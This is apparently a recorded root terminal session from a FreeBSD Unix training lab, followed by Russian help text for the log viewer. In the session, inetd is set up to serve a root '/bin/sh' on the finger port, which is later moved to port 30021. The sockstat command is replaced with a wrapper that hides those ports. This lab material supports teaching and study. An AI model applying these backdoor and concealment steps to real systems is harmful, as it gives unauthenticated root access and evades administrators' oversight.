10:43:55
|
#strings `which sandmail` | grep /etc
^C |
| /l3/users/abear/nt-bsdnet/fbsd3.unix.nt/root :1 :2 :3 :4 :5 :6 :7 :8 :9 :10 :11 :12 :13 :14 :15 :16 :17 :18 :19 :20 :21 :22 :23 :24 :25 :26 :27 :28 :29 :30 :31 |
|
|
#ps aux | grep inetd
root 33913 0.0 0.0 1352 892 ?? Ss 8:39AM 0:00.00 /usr/sbin/inetd -w root 33920 0.0 0.0 1508 1020 p9 S+ 8:39AM 0:00.00 grep inetd |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#vi /etc/inetd.conf
13c13 < #telnet stream tcp nowait root /usr/libexec/telnetd telnetd --- > telnet stream tcp nowait root /usr/libexec/telnetd telnetd |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 33970 4 tcp4 *:23 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#strings `which inetd` | grep /etc
/etc/inetd.conf |
|
#vi /etc/inetd.conf
14c14 < #telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd --- > telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd |
|
#strings `which sendmail` | grep /etc
/etc/mail/mailer.conf |
|
#telnet 127.0.0.1
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. Trying SRA secure login: User (root): rootpass Password: [ SRA login failed ] User (root): root Password: [ SRA login failed ] User (root): Password: [ SRA login failed ] User (root): ^C |
|
#telnet 127.0.0.1
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. Trying SRA secure login: User (root): root Password: [ SRA login failed ] User (root): root Password: [ SRA login failed ] User (root): ^[[A^[[A^C |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#ldd `which inetd` | grep wrap
libwrap.so.4 => /usr/lib/libwrap.so.4 (0x28088000)
|
|
#vi /etc/inetd.conf
18a19 > finger stream tcp nowait root /bin/cat cat |
|
#ldd `which sshd` | grep wrap
libwrap.so.4 => /usr/lib/libwrap.so.4 (0x280e8000)
|
|
#pkg_info samba
pkg_info: can't find package 'samba' installed or in a file! |
|
#pkg_info -Dx samba
Information for samba-2.2.12: Install notice: ======================================================================= WARNING: In FreeBSD, it's known that compiling samba with any kind of optimization flags might cause problems under certain circumstance. If you caught any show stopper, please try taking optimization flag(s) out of your CFLAGS and recompile/reinstall samba. ======================================================================= Information for samba-libsmbclient-3.0.14a_2: |
|
#pkg_info -Lx samba
/usr/local/share/swat/using_samba/ch02_06.html /usr/local/share/swat/using_samba/ch03_01.html /usr/local/share/swat/using_samba/ch03_02.html /usr/local/share/swat/using_samba/ch03_03.html /usr/local/share/swat/using_samba/ch04_01.html /usr/local/share/swat/using_samba/ch04_02.html /usr/local/share/swat/using_samba/ch04_03.html /usr/local/share/swat/using_samba/ch04_04.html /usr/local/share/swat/using_samba/ch04_05.html /usr/local/share/swat/using_samba/ch04_06.html ... /usr/local/include/libsmbclient.h /usr/local/lib/libsmbclient.a /usr/local/lib/libsmbclient.so /usr/local/lib/libsmbclient.so.0 /usr/local/share/examples/samba-libsmbclient/Makefile /usr/local/share/examples/samba-libsmbclient/README /usr/local/share/examples/samba-libsmbclient/testacl.c /usr/local/share/examples/samba-libsmbclient/testbrowse.c /usr/local/share/examples/samba-libsmbclient/testsmbc.c /usr/local/share/examples/samba-libsmbclient/tree.c |
|
#pkg_info -W samba
pkg_info: samba: file is not in PATH |
|
#pkg_info -x samba
Information for samba-2.2.12: Comment: A free SMB and CIFS client and server for UNIX Description: The Samba suite is a set of programs which run under the FreeBSD operating system. These programs deliver most of the important functionality of a Microsoft Lan Manager server. That is, they support remote access to FreeBSD filespace and FreeBSD printers from Lan Manager compatible clients. In practical terms, this means that such clients can connect to and use FreeBSD filespace as if it was a local disk drive, ... sound-juicer-2.10.1 totem-gstreamer-1.0.4 vino-2.10.0 ximian-connector-2.2.2 yelp-2.10.0_1 gnome2-2.10.2 Description: This is the shared library from the Samba port. It lets other programs to use the SMB protocol. WWW: http://www.samba.org/ |
|
#strings `which samba` | grep /etc
^C |
|
#strings `which samba` | grep /
^C |
|
#strings `which samba` | grep /usr
^C |
|
#pkg_info -Dx samba
Information for samba-2.2.12: Install notice: ======================================================================= WARNING: In FreeBSD, it's known that compiling samba with any kind of optimization flags might cause problems under certain circumstance. If you caught any show stopper, please try taking optimization flag(s) out of your CFLAGS and recompile/reinstall samba. ======================================================================= Information for samba-libsmbclient-3.0.14a_2: |
|
#pkg_info -Lx samba
/usr/local/share/swat/using_samba/ch02_06.html /usr/local/share/swat/using_samba/ch03_01.html /usr/local/share/swat/using_samba/ch03_02.html /usr/local/share/swat/using_samba/ch03_03.html /usr/local/share/swat/using_samba/ch04_01.html /usr/local/share/swat/using_samba/ch04_02.html /usr/local/share/swat/using_samba/ch04_03.html /usr/local/share/swat/using_samba/ch04_04.html /usr/local/share/swat/using_samba/ch04_05.html /usr/local/share/swat/using_samba/ch04_06.html ... /usr/local/include/libsmbclient.h /usr/local/lib/libsmbclient.a /usr/local/lib/libsmbclient.so /usr/local/lib/libsmbclient.so.0 /usr/local/share/examples/samba-libsmbclient/Makefile /usr/local/share/examples/samba-libsmbclient/README /usr/local/share/examples/samba-libsmbclient/testacl.c /usr/local/share/examples/samba-libsmbclient/testbrowse.c /usr/local/share/examples/samba-libsmbclient/testsmbc.c /usr/local/share/examples/samba-libsmbclient/tree.c |
|
#strings `which samba` | grep /usr/local/etc/
^C |
|
#strings `which samba` | grep /usr/local/bin/
^C |
|
#strings `which samba` | grep /usr/local/share/examples/
^C |
|
#strings `which samba` | grep /usr/local/share/examples/samba
^C |
|
#less /etc/rc.conf
|
|
#man pkg_dekete
|
|
#man pkg_delete
|
|
#cd /var/db/
|
|
#ls
entropy locate.database pkg portsnap ipf mountdtab ports scrollkeeper |
|
#ls -G
entropy locate.database pkg portsnap ipf mountdtab ports scrollkeeper |
|
#cd pkg/
|
|
#ls -G
libart_lgpl2-2.3.17 libaudiofile-0.2.6 libbonobo-2.10.0 libbonoboui-2.10.1 libcroco-0.6.0_1 libdts-0.0.2 libdvdcss-1.2.8_1 libdvdnav-0.1.9_1 libdvdread-0.9.4_1 libexif-0.6.12_1 ... xorg-printserver-6.8.2 xorg-server-6.8.2_6 xorg-vfbserver-6.8.2 xpdf-3.00_7 xscreensaver-gnome-4.22 xterm-203 xv-3.10a_5 xvid-1.0.3,1 yelp-2.10.0_1 zenity-2.10.0 |
|
#cd samba-2.2.12/
|
|
#ls
+COMMENT +CONTENTS +DESC +DISPLAY +MTREE_DIRS |
|
#ls -G
+COMMENT +CONTENTS +DESC +DISPLAY +MTREE_DIRS |
|
#man pkg_delete
|
|
#pkg_delete /var/db/pkg/samba-2.2.12/
|
|
#ls -G
|
|
#cd ..
bash: cd: ..: No such file or directory |
|
#cd /var/db/pkg/
|
|
#ls -G
liba52-0.7.4_1 libart_lgpl2-2.3.17 libaudiofile-0.2.6 libbonobo-2.10.0 libbonoboui-2.10.1 libcroco-0.6.0_1 libdts-0.0.2 libdvdcss-1.2.8_1 libdvdnav-0.1.9_1 libdvdread-0.9.4_1 ... xorg-printserver-6.8.2 xorg-server-6.8.2_6 xorg-vfbserver-6.8.2 xpdf-3.00_7 xscreensaver-gnome-4.22 xterm-203 xv-3.10a_5 xvid-1.0.3,1 yelp-2.10.0_1 zenity-2.10.0 |
|
#pkg_info -Dx samba
Information for samba-libsmbclient-3.0.14a_2: |
|
#pkg_info -Dx samba
Information for samba-3.0.14a_1,1: Install notice: Samba3 package now doesn't include ADS support due the portability problems with Kerberos5 libraries on different installations. You need to compile port yourself to get this functionality. For additional hints and directions, please, look into the README.FreeBSD file. Information for samba-libsmbclient-3.0.14a_2: |
|
#sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 34084 4 tcp4 *:23 *:* root sshd 26124 3 tcp4 192.168.15.23:22 192.168.15.25:60594 root sshd 26060 3 tcp4 192.168.15.23:22 192.168.15.24:52430 root sshd 25855 3 tcp4 192.168.15.23:22 192.168.15.254:41665 root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#pkg_info -Lx samba
/usr/local/share/swat/using_samba/figs/sam2_0320.gif /usr/local/share/swat/using_samba/figs/sam2_0321.gif /usr/local/share/swat/using_samba/figs/sam2_0322.gif /usr/local/share/swat/using_samba/figs/sam2_0323.gif /usr/local/share/swat/using_samba/figs/sam2_0324.gif /usr/local/share/swat/using_samba/figs/sam2_0325.gif /usr/local/share/swat/using_samba/figs/sam2_0326.gif /usr/local/share/swat/using_samba/figs/sam2_0327.gif /usr/local/share/swat/using_samba/figs/sam2_0328.gif /usr/local/share/swat/using_samba/figs/sam2_0329.gif ... /usr/local/include/libsmbclient.h /usr/local/lib/libsmbclient.a /usr/local/lib/libsmbclient.so /usr/local/lib/libsmbclient.so.0 /usr/local/share/examples/samba-libsmbclient/Makefile /usr/local/share/examples/samba-libsmbclient/README /usr/local/share/examples/samba-libsmbclient/testacl.c /usr/local/share/examples/samba-libsmbclient/testbrowse.c /usr/local/share/examples/samba-libsmbclient/testsmbc.c /usr/local/share/examples/samba-libsmbclient/tree.c |
|
#/etc/rc.d/inetd stop
Stopping inetd. |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 34084 4 tcp4 *:23 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#/usr/local/etc/rc.d/samba.sh
/usr/local/etc/rc.d/samba.sh: WARNING: /usr/local/etc/smb.conf is not readable. |
|
#/usr/local/etc/rc.d/samba.sh start
/usr/local/etc/rc.d/samba.sh: WARNING: /usr/local/etc/smb.conf is not readable. |
|
#ls -aGl /usr/local/etc/
total 584 drwxr-xr-x 10 root wheel 1024 Nov 28 09:25 . drwxr-xr-x 18 root wheel 512 Nov 28 09:25 .. -r--r--r-- 1 root wheel 87868 Nov 26 13:36 Muttrc -r--r--r-- 1 root wheel 87868 Oct 12 2005 Muttrc.dist -r--r--r-- 1 root wheel 2561 Oct 12 2005 a2ps-site.cfg -r--r--r-- 1 root wheel 15202 Oct 12 2005 a2ps.cfg drwxr-xr-x 2 root wheel 512 Nov 26 13:43 bonobo-activation -r--r--r-- 1 root wheel 1107 Nov 26 13:44 cdrecord -r--r--r-- 1 root wheel 1107 Oct 12 2005 cdrecord.sample ... -r--r--r-- 1 root wheel 766 Oct 12 2005 rsyncd.conf.sample -rw-r--r-- 1 root wheel 3312 Nov 27 08:22 screenrc -r--r--r-- 1 root wheel 10075 Nov 28 09:25 smb.conf.default drwxr-xr-x 2 root wheel 512 Nov 26 13:41 snmp -r--r----- 1 root wheel 4127 Oct 12 2005 sudoers -r--r--r-- 1 root wheel 4127 Oct 12 2005 sudoers.sample -r--r--r-- 1 root wheel 4022 Nov 26 16:15 wgetrc drwxr-xr-x 3 root wheel 512 Nov 26 13:38 xdg -r--r--r-- 1 root wheel 340 Oct 12 2005 xml2Conf.sh -r--r--r-- 1 root wheel 232 Oct 12 2005 xsltConf.sh |
|
#telnet 127.0.0.1 finger
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. asdfsadfsadsadf asdfsadfsadsadf asdfsadfsadfsadfsafd asdfsadfsadfsadfsafd asdfsadfsadfsaf asdfsadfsadfsaf sdasad sdasad ^] telnet> q Connection closed. |
|
#vi /etc/inetd.conf
19c19,21 < finger stream tcp nowait root /bin/cat cat --- > > finger stream tcp nowait root /bin/sh sh -i > |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#telnet 127.0.0.1 finger
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. sh: can't access tty; job control turned off \[v2#\!#$?#$UID#$$#$(/bin/date +%s)$(l3_save_last_line)#$PWD#\033[1024D\033[K\]\[\033[0;31m\][\u@fbsd3:PS1='$ ' id : not found id # uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) ^]q telnet> q Connection closed. |
|
#vi /etc/inetd.conf
20c20 < finger stream tcp nowait root /bin/sh sh -i --- > finger stream tcp nowait root /bin/sh sh |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#telnet 127.0.0.1 finger
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. id # uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) w # 9:34AM up 2:37, 10 users, load averages: 0.05, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE WHAT root v0 - 7:13AM 3 script -t 0 -q /root/. root v1 - 7:51AM 7 script -t 0 -q /root/. ... user v4 - 7:14AM 2:21 script -t 0 -q /home/u user p2 :0.0 7:19AM 2:12 script -t 0 -q /home/u root p6 192.168.15.254 8:14AM - script -t 0 -q /root/. root p8 192.168.15.26 9:31AM 4 script -t 0 -q /root/. root p9 :ttyp7:S.0 8:47AM - script -t 0 -q /root/. root pc fbsd4.linux.nt 8:16AM 38 script -t 0 -q /root/. root pe fbsd5.linux.nt 8:17AM 41 script -t 0 -q /root/. ^] telnet> q Connection closed. |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 37942 4 tcp4 *:23 *:* root inetd 37942 6 tcp4 *:79 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#grep 79 /etc/services
finger 79/tcp finger 79/udp bgp 179/tcp #Border Gateway Protocol bgp 179/udp #Border Gateway Protocol # 265-279 unassigned is99c 379/tcp #TIA/EIA/IS-99 modem client is99c 379/udp #TIA/EIA/IS-99 modem client iafserver 479/tcp iafserver 479/udp decbsrv 579/tcp decbsrv 579/udp dbreporter 1379/tcp #Integrity Solutions dbreporter 1379/udp #Integrity Solutions dberegister 1479/tcp dberegister 1479/udp |
|
#grep finger /etc/inetd.conf
finger stream tcp nowait root /bin/sh sh #finger stream tcp nowait/3/10 nobody /usr/libexec/fingerd fingerd -s #finger stream tcp6 nowait/3/10 nobody /usr/libexec/fingerd fingerd -s |
|
#last
root ttyp8 192.168.15.26 Tue Nov 28 09:31 still logged in root ttyp8 192.168.15.26 Tue Nov 28 08:48 - 08:58 (00:10) user ttypa fbsd4.linux.nt Tue Nov 28 08:47 - 08:47 (00:00) root ttypg 192.168.15.26 Tue Nov 28 08:21 - 08:47 (00:25) root ttype fbsd5.linux.nt Tue Nov 28 08:17 still logged in root ttypc fbsd4.linux.nt Tue Nov 28 08:16 still logged in root ttyp6 192.168.15.254 Tue Nov 28 08:14 still logged in root ttyv2 Tue Nov 28 08:12 still logged in root ttyv1 Tue Nov 28 07:51 still logged in user ttyp2 :0.0 Tue Nov 28 07:19 still logged in ... root ttyp0 192.168.15.254 Sun Nov 26 16:13 - 16:14 (00:00) root ttyp0 192.168.15.254 Sun Nov 26 16:12 - 16:12 (00:00) root ttyp0 192.168.15.254 Sun Nov 26 16:07 - 16:12 (00:04) root ttyp0 192.168.15.254 Sun Nov 26 16:06 - 16:06 (00:00) user ttyv1 Sun Nov 26 14:31 - shutdown (02:20) user ttyv0 Sun Nov 26 13:56 - shutdown (02:56) root ttyv0 Sun Nov 26 13:55 - 13:56 (00:01) root ttyv0 Sun Nov 26 13:54 - 13:54 (00:00) reboot ~ Sun Nov 26 13:53 wtmp begins Sun Nov 26 13:53:20 UTC 2006 |
|
#netstat -4l
netstat: illegal option -- 4
usage: netstat [-AaLnSW] [-f protocol_family | -p protocol]
[-M core] [-N system]
netstat -i | -I interface [-abdhnt] [-f address_family]
[-M core] [-N system]
netstat -w wait [-I interface] [-d] [-M core] [-N system]
netstat -s [-s] [-z] [-f protocol_family | -p protocol] [-M core]
netstat -i | -I interface -s [-f protocol_family | -p protocol]
[-M core] [-N system]
netstat -m [-M core] [-N system]
netstat -r [-AenW] [-f address_family] [-M core] [-N system]
netstat -rs [-s] [-M core] [-N system]
netstat -g [-W] [-f address_family] [-M core] [-N system]
netstat -gs [-s] [-f address_family] [-M core] [-N system]
|
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 37942 4 tcp4 *:23 *:* root inetd 37942 6 tcp4 *:79 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#which bc
/usr/bin/bc |
|
#vi /etc/inetd.conf
20c20 < finger stream tcp nowait root /bin/sh sh --- > finger stream tcp nowait root /usr/bin/bc bc |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#telnet 127.0.0.1 finger
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. 1+2+3*23424234243 (standard_in) 1: illegal character: ^M 1+2143234243*2342243234 # 5019975904543861863 ^] telnet> q Connection closed. |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 38047 4 tcp4 *:23 *:* root inetd 38047 6 tcp4 *:79 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#which sockstat
/usr/bin/sockstat |
|
#cp `!!` `!!`.orig
cp `which sockstat ` `which sockstat `.orig |
|
#vi /usr/bin/sockstat
|
|
#rm /usr/bin/sockstat
|
|
#vi /usr/bin/sockstat
|
|
#chmod +x /usr/bin/sockstat
|
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 38047 4 tcp4 *:23 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 38047 4 tcp4 *:23 *:* root sshd 37745 3 tcp4 192.168.15.23:22 192.168.15.26:64310 root sshd 26124 3 tcp4 192.168.15.23:22 192.168.15.25:60594 root sshd 26060 3 tcp4 192.168.15.23:22 192.168.15.24:52430 root sshd 25855 3 tcp4 192.168.15.23:22 192.168.15.254:41665 root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#sockstat
user clock-appl 817 32 stream /var/tmp/orbit-user/linc-331-0-68d238b3b6419 user clock-appl 817 33 stream -> /var/tmp/orbit-user/linc-2f7-0-60e316bad374 user clock-appl 817 34 stream -> /var/tmp/orbit-user/linc-329-0-68d2b7c36ed5b user gnome-vfs- 813 15 stream /tmp/.ICE-unix/752 user gnome-vfs- 813 27 stream -> /var/tmp/orbit-user/linc-2f2-0-77853aee60af8 user gnome-vfs- 813 28 stream /var/tmp/orbit-user/linc-32d-0-163a3062be274 user gnome-vfs- 813 30 stream /var/tmp/orbit-user/linc-32d-0-163a3062be274 user gnome-vfs- 813 31 stream /var/tmp/orbit-user/linc-32d-0-163a3062be274 user gnome-vfs- 813 32 stream -> /var/tmp/orbit-user/linc-2f7-0-60e316bad374 user gnome-vfs- 813 36 stream /var/tmp/orbit-user/linc-32d-0-163a3062be274 ... smmsp sendmail 455 3 dgram -> /var/run/log root sendmail 451 3 dgram -> /var/run/logpriv root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 3 tcp6 *:22 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 3 dgram /var/run/log root syslogd 319 4 dgram /var/run/logpriv root syslogd 319 5 udp6 *:514 *:* root syslogd 319 6 udp4 *:514 *:* root devd 290 4 stream /var/run/devd.pipe |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 38047 4 tcp4 *:23 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#telnet 127.0.0.1 79
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. 1+2 # 3 ^] telnet> q Connection closed. |
|
#nmap 127.0.0.1
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-11-28 09:45 UTC Interesting ports on localhost.unix.nt (127.0.0.1): (The 1659 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 79/tcp open finger Nmap finished: 1 IP address (1 host up) scanned in 10.352 seconds |
|
#vi /etc/services
2112a2113 > finger21 30021/tcp 2114a2116,2118 > > > |
|
#vi /etc/inetd.conf
20c20 < finger stream tcp nowait root /usr/bin/bc bc --- > finger21 stream tcp nowait root /usr/bin/bc bc |
|
#/etc/rc.d/inetd restart
Stopping inetd. Starting inetd. |
|
#telnet 127.0.0.1 30021
Trying 127.0.0.1... Connected to localhost.unix.nt. Escape character is '^]'. ^] telnet> q Connection closed. |
|
#vi /usr/bin/sockstat
3c3 < /usr/bin/sockstat.orig "$@" | egrep -v ':(79|finger)' --- > /usr/bin/sockstat.orig "$@" | egrep -v ':(30021|finger21)' |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root inetd 38232 4 tcp4 *:23 *:* root sendmail 451 4 tcp4 127.0.0.1:25 *:* root sshd 445 4 tcp4 *:22 *:* root syslogd 319 6 udp4 *:514 *:* |
|
#which /usr/libexec/tcpd
/usr/libexec/tcpd |
| Время первой команды журнала | 10:39:06 2006-11-28 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Время последней команды журнала | 11:47:14 2006-11-28 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Количество командных строк в журнале | 101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Процент команд с ненулевым кодом завершения, % | 12.87 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Процент синтаксически неверно набранных команд, % | 0.00 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Суммарное время работы с терминалом *, час | 1.14 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Количество командных строк в единицу времени, команда/мин | 1.48 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Частота использования команд |
|
В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l bash: l: command not found |
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4 |
Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
$ find / -name abc find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C |
Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id uid=0(root) gid=0(root) Gruppen=0(root) |
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc
|
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc |
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.
Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
$ whoami
user
$ #^ Интересно, кто я?в журнале это будет выглядеть так:
$ whoami
user
| Интересно, кто я? |
Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:
$ whoami
user
$ cat > /dev/null #^ Интересно, кто я?
Программа whoami выводит имя пользователя, под которым мы зарегистрировались в системе. - Она не может ответить на вопрос о нашем назначении в этом мире.В журнале это будет выглядеть так:
$ whoami user
|
Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=
1
2
3
4
Группы команд, выполненных на разных терминалах, разделяются специальной линией.
Под этой линией в правом углу показано имя терминала, на котором выполнялись команды.
Для того чтобы посмотреть команды только одного сенса,
нужно щёкнуть по этому названию.
LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008